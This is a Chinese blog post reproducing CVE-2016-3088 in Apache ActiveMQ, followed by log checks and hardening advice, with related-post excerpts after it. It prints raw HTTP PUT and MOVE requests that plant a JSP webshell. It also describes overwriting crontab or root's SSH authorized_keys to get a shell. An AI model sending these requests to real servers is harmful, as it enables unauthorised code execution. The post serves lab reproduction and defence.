Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)复现及排查

最新推荐文章于 2025-06-17 20:38:12 发布
最新推荐文章于 2025-06-17 20:38:12 发布
阅读量2.6k 收藏 1
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 渗透 应急响应 文章标签: apache activemq 网络安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/youuzi/article/details/132278913

目录

概述

影响版本

漏洞复现

1、写入Webshell

2、写入Crontab或Ssh Key

3、写入Jetty.Xml或Jar

应急排查

1、ActiveMQ的日志配置

 2、排查activemq.log日志和docker日志

加固建议

参考链接

概述

ActiveMQ的web控制台分三个应用,admin、api和fileserver,其中admin是管理员页面,api是接口,fileserver是储存文件的接口;admin和api都需要登录后才能使用,fileserver无需登录。

    fileserver是一个RESTful API接口,我们可以通过GET、PUT、DELETE等HTTP请求对其中存储的文件进行读写操作,其设计目的是为了弥补消息队列操作不能传输、存储二进制文件的缺陷,但后来发现:

  • 其使用率并不高
  • 文件操作容易出现漏洞

   所以,ActiveMQ在5.12.x~5.13.x版本中,已经默认关闭了fileserver这个应用(你可以在conf/jetty.xml中开启之);在5.14.0版本以后,彻底删除了fileserver应用。

本漏洞出现在fileserver应用中,漏洞原理其实非常简单,就是fileserver支持写入文件(但不解析jsp),同时支持移动文件(MOVE请求)。所以,我们只需要写入一个文件,然后使用MOVE请求将其移动到任意位置,造成任意文件写入漏洞。

影响版本

Apache ActiveMQ 5.x ~ 5.14.0

漏洞复现

文件写入的几种方法

  • 写入webshell(fileserver不解析jsp,admin和api两个应用需要登录才能访问)
  • 写入cron或ssh key等文件(可直接反弹shell,方便,但需要权限足够)
  • 写入jar或jetty.xml等库和配置文件(前者需要jar的后门,后者需要activemq的绝对路径)

1、写入Webshell

如上所说,写入webshell,需要写在admin或api应用中,这两个应用需要登录才能访问,默认为admin/admin。登录后访问”http://192.168.52.131:8161/admin/test/systemProperties.jsp”,可获知ActiveMQ的绝对路径

 网上有种构造put包获取绝对路径的方法,我这里的环境不可行,应该是版本问题。

 

 使用PUT方法上传webshell

PUT /fileserver/test.txt HTTP/1.1
Host: 192.168.52.131:8161
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh,en;q=0.9
Content-Length: 12

webshelltest

 

 在fileserver目录中webshell是没有执行权限的,这里使用MOVE方法将webshell移动到admin目录(也可以用相对路径)

MOVE /fileserver/test.txt HTTP/1.1
Host: 192.168.52.131:8161
Destination:file:///opt/activemq/webapps/admin/test.jsp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: */*
Accept-Language: zh-CN,zh,en;q=0.9
Content-Length: 0

 

使用工具连接webshell(需要登录),需要把cookie信息放入连接包中。

2、写入Crontab或Ssh Key

同样的方法使用put方法上传cron配置文件(注:换行一定要

\n

,不能是

\r\n

,否则crontab执行会失败

 将cron移动计划任务项中

 写入ssh公钥的方式也是一样,先put方式上传公钥,后面使用MOVE方法移动到/root/.ssh/并重命名authorized_keys。(注:需要相应的权限)

 

3、写入Jetty.Xml或Jar

针对此种方式,理论上我们可以覆盖jetty.xml,将admin和api的登录限制去掉,然后再写入webshell。有的情况下,jetty.xml和jar的所有人是web容器的用户,所以相比起来,写入crontab成功率更高一点。

应急排查

1、ActiveMQ的日志配置

在当前 ActiveMQ 配置下,为了从控制台和后台明确看到每一条消息收发情况,并且在日志中记录消息详情,这一功能的实现是依赖器插件 Logging Interceptor 实现的。

ActiveMQ的日志信息主要在如下两个配置文件中:

(1)conf/log4j.properties

 (2)cong/logging.properties

 2、排查activemq.log日志和docker日志

从activemq.log日志和docker日志来看,我们的攻击默认是不会记录 的,不管是访问来来源ip,url,状态码都是没有记录的,activemq日志只会记录自身运行信息。

 

加固建议

1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建议用户升级至 5.14.0 及其以后版本。

2、通过移除 conf\jetty.xml 的以下配置来禁用 ActiveMQ Fileserver 功能

参考链接

Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)分析
http://activemq.apache.org/security-advisories.data/CVE-2016-3088-announcement.txt

activemq 远程代码执行CVE-2016-3088
qq_32445755的博客
03-31 621
简介 ActiveMQApache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了 jetty。Apache ActiveMQ Fileserver 存在多个安全漏洞,可使远程攻击者用恶意代码替代 Web 应用,在受影响系统上执行远程代码,请拿到 flag,默认在/tmp/目录中。提示:该漏洞一句话木马无法执行,请利用命令执行
漏洞复现ActiveMQ文件上传漏洞(CVE-2016-3088)
晚风不及你
01-05 734
Apache ActiveMQApache软件基金会所研发的开放源代码消息中间件。ActiveMQ是消息队列服务,是面向消息中间件(MOM)的最终实现,它为企业消息传递提供高可用、出色性能、可扩展、稳定和安全保障。
Apache ActiveMQ 远程代码执行漏洞复现(CVE-2023-46604)
2401_84968269的博客
05-13 1128
近期在漏洞扫描时发现服务器存在CVE-2023-46604漏洞,故做一下漏洞复现记录。
Apache ActiveMQ 远程代码执行漏洞复现(CNVD-2023-69477)
huangyongkang666的博客
10-31 9690
上周爆出来的activeMQ远程代码执行漏洞,正好做一下漏洞复现,记录一下。
ActiveMQ技术
最新发布
ctlongs的博客
06-17 657
Apache ActiveMQ 是一个开源消息中间件,支持 JMS 规范,提供异步通信、消息持久化等功能。它支持点对点(Queue)和发布/订阅(Topic)两种消息模型,适用于系统解耦、异步任务处理等场景。安装需JDK环境,通过解压包并运行启动脚本即可启动服务,管理控制台默认端口8161。核心组件包括Broker、Destination等,配置主要通过activemq.xml文件。编程示例展示了Java实现消息发送接收的基本流程,同时介绍了消息持久化、选择器等高级功能。ActiveMQ还支持集群部署实现高
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
weixin_44047654的博客
11-25 3183
ActiveMQ远程代码执行漏洞(CVE-2016-3088)
Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现
chenming08的博客
04-27 910
4、进入ActiveMQ :http://your-ip:8161/admin/test/systemProperties.jsp(攻击机)7、然后将上传的webshell移到/opt/activemq/webapps/api/1.jsp。10、使用命令执行http://X.X.X.X:8161/api/1.jsp?1、进入环境cd activemq/CVE-2016-3088/(靶机)上传webshell到/fileserver/1.txt(攻击机)6、查看/fileserver/1.txt。
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
weixin_48400575的博客
01-23 3241
ActiveMQ 任意文件写入漏洞 (CVE-2016-3088)复现实验报告
Apache ActiveMQ RCE漏洞复现CVE-2023-46604)
0xSec
10-26 9161
ActiveMQ是一个开源的消息代理和集成模式服务器,它支持Java消息服务(JMS) API。它是Apache Software Foundation下的一个项目,用于实现消息中间件,帮助不同的应用程序或系统之间进行通信。Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行
ActiveMQ 远程代码执行漏洞cve-2022-41678复现
weixin_42786460的博客
12-16 1969
ActiveMQ 远程代码执行漏洞cve-2022-41678复现
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088复现
m0_69994768的博客
01-23 1364
Apache ActiveMQ 远程代码执行漏洞CVE-2016-3088
vulhub学习(2) Apache ActiveMQ 远程代码执行漏洞 (CVE-2016-3088)复现
yukinorong的博客
06-24 3302
漏洞环境 配置vulhub , 在目录activemq/CVE-2016-3088中打开docker。 docker中显示 此时开启了两个端口分别为8161和61616 其中61616是工作端口,消息在这个端口进行传递; 8161是网络管理页面端口 访问http://your-ip:8161即可看到网络管理页面,不过这个漏洞理论上是不需要网络的。 利用浏览器进入网络管理页面 进入admin界面,默认密码账号为admin 漏洞原理 ActiveMQ Web控制台分为三个应用程序:admin,api和f
Apache ActiveMQ 远程代码执行漏洞分析
蚁景网安学院
01-09 1481
Apache ActiveMQ官方发布新版本,修复了一个远程代码执行漏洞,攻击者可构造恶意请求通过Apache ActiveMQ的61616端口发送恶意数据导致远程代码执行,从而完全控制Apache ActiveMQ服务器。
漏洞复现-Apache ActiveMQ RCE漏洞复现(CNVD-2023-69477)
玄道的网安博客
08-11 1303
Apache ActiveMQ 中存在远程代码执行漏洞Apache ActiveMQ在默认安装下开放了61616服务端口,而该端口并没有对传入数据进行适当的过滤,从而使攻击者能够构造恶意数据以实现远程代码执行。类, 然后重写对应的逻辑,这样在运⾏的时候, 因为。查找顺序的问题, 程序就会优先使⽤当前源码⽬录⾥的。然后随便打⼏个断点试试 (注意在⼀次通信的过程中。获取到了对应的序列化器之后, 会调⽤它的。⽅法, 后者可以调⽤任意类的带有⼀个。⼀些其它的数据, 调试的时候记得判断)⽅法的利⽤, 这块其实跟。
Apache ActiveMQ Jolokia 远程代码执行漏洞CVE-2022-41678)
Flag少侠的博客
10-19 2283
Apache ActiveMQ是一个流行的开源、基于Java的消息代理,支持多种协议,能够为不同语言和平台的客户端提供服务。它支持AMQP、STOMP、MQTT等多种消息协议,能够满足各种消息使用场景。ActiveMQ分为两个版本:经典版(Classic)和下一代版本(Artemis)。经典版拥有成熟的架构和广泛的插件支持,而Artemis版则提供了高性能、非阻塞的架构,适用于新一代的消息应用。
Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)
spinage的博客
04-09 1025
攻击者可通过构造恶意HTTP请求,上传JSP Webshell至Web应用目录,最终实现任意代码执行,完全控制服务器。
Apache ActiveMQ 远程代码执行漏洞复现(CVE-2016-3088)
又菜又爱倒腾的博客
10-29 1913
#Apache ActiveMQ 远程代码执行漏洞(CVE-2016-3088)# 一、漏洞简介 ActiveMQApache 软件基金会下的一个开源消息驱动中间件软件。Jetty 是一个开源的 servlet 容器,它为基于 Java 的 web 容器,例如 JSP 和 servlet 提供运行环境。ActiveMQ 5.0 及以后版本默认集成了jetty。在启动后提供一个监控 ActiveMQ 的 Web 应用。 2016年4月14日,国外安全研究人员 Simon Zuckerbraun 曝光 A
activemq系列漏洞复现
m0_49420271的博客
06-07 3090
vulhub中activemq系列漏洞复现
AvtiveMQ任意文件上传漏洞(CVE-2016-3088)漏洞复现
03-19
### CVE-2016-3088 漏洞概述 CVE-2016-3088Apache ActiveMQ 的一个任意文件写入漏洞,主要由于 `fileserver` 应用未受保护且允许通过 HTTP 请求创建和移动文件。此漏洞影响的版本范围为 Apache ActiveMQ 5.x 至 5.14.0 版本[^3]。 --- ### 环境准备 为了复现漏洞,需搭建受影响的环境: #### 使用 VulnHub 靶场 VulnHub 提供了一个方便的漏洞测试平台,可以快速部署目标服务。按照以下步骤操作: 1. 下载并启动 Docker 或虚拟机镜像。 2. 安装指定版本的 Apache ActiveMQ(如 5.13.0),确保其配置启用了 `fileserver` 功能。 3. 修改 `conf/jetty.xml` 文件中的 `<bean>` 节点,启用 `fileserver` Web 应用程序。 ```bash docker run --name activemq -p 8161:8161 webcenter/activemq:5.13.0 ``` 上述命令会运行一个容器化的 ActiveMQ 实例,并将其管理端口映射到主机上的 8161 端口。 --- ### 漏洞验证方法 #### 利用工具或手动发送请求 可以通过向 `/fileserver/{filename}` 发送 `PUT` 请求来验证是否存在漏洞。以下是具体过程: 1. **构造恶意请求** 向服务器发送一个带有自定义数据体的 `PUT` 请求,尝试在 `fileserver` 中创建新文件。 ```http PUT /fileserver/test.txt HTTP/1.1 Host: localhost:8161 Content-Type: text/plain Content-Length: 17 This is a test file. ``` 2. **确认文件已成功上传** 访问路径 `/fileserver/test.txt` 并查看返回的内容是否匹配预期的数据。 3. **执行 MOVE 方法** 将刚刚创建的文件移动至其他目录下,例如 Tomcat 的根目录或其他可加载的位置。 ```http MOVE /fileserver/test.txt HTTP/1.1 Host: localhost:8161 Destination: http://localhost:8161/tomcat/webapps/root/shell.jsp Overwrite: T ``` 如果一切正常,则会在目标位置生成新的 JSP 文件,从而实现远程代码执行的效果。 --- ### 自动化检测脚本 (POC) XRay 工具提供了针对 CVE-2016-3088 的自动化扫描功能,下面是一个简单的 YAML 格式的 POC 描述文件[^4]: ```yaml name: poc-yaml-activemq_CVE-2016-3088 set: r1: randomInt(5, 10) r2: randomLowercase(r1) rules: - method: PUT path: /fileserver/{{r2}} expression: | response.status == 204 detail: author: laura_lion links: - https://github.com/Laura0xiaoshizi ``` 将以上内容保存为 `.yaml` 文件后导入 XRay 执行即可完成批量探测工作。 --- ### 注意事项 尽管漏洞利用相对简单,但在实际环境中应严格遵循法律规范,仅限于授权范围内进行渗透测试活动。此外,在生产环境下务必及时更新软件补丁以防止此类安全风险的发生。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值